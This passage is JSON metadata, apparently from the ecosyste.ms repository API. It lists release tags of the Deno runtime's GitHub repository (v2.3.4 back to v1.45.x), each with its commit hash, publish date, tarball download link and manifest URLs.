ub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf